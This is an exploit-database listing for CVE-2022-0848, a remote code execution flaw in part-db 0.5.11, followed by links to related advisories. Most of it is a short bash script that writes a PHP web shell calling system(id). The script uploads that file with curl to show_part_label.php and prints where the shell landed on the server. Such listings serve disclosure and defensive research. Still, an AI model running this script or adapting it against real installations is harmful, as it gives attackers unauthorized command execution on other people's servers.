Lucene search
Chetanya Sharma1337DAY-ID-37447HistoryMar 07, 2022 - 12:00 a.m.
part-db 0.5.11 - Remote Code Execution Exploit
2022-03-0700:00:00
Chetanya Sharma
0day.today
381
remote code execution
part-db
curl command
php shell code
cve-2022-0848
exploit
EPSS
0.089
Percentile
94.6%
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------
#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "<?php system(id); ?>">POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "[emailΒ protected]" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"
Related
cvelist
cvelist
CVE-2022-0848 OS Command Injection in part-db/part-db
2022-03-04 08:25:10
exploitdb
exploitdb
part-db 0.5.11 - Remote Code Execution (RCE)
2022-03-07 00:00:00
githubexploit
githubexploit
Exploit for OS Command Injection in Part-Db Project Part-Db
2022-07-15 06:28:21
Exploit for OS Command Injection in Part-Db Project Part-Db
2022-03-11 07:26:04
packetstorm
packetstorm
part-db 0.5.11 Remote Code Execution
2022-03-07 00:00:00
checkpoint_advisories
checkpoint_advisories
Part-DB Project Unrestricted File Upload (CVE-2022-0848)
2022-11-10 00:00:00
osv
osv
CVE-2022-0848
2022-03-04 09:15:07
prion
prion
Command injection
2022-03-04 09:15:00
nvd
nvd
CVE-2022-0848
2022-03-04 09:15:07
huntr
huntr
OS Command Injection in part-db/part-db
2022-02-15 11:36:18
cve
cve
CVE-2022-0848
2022-03-04 09:15:07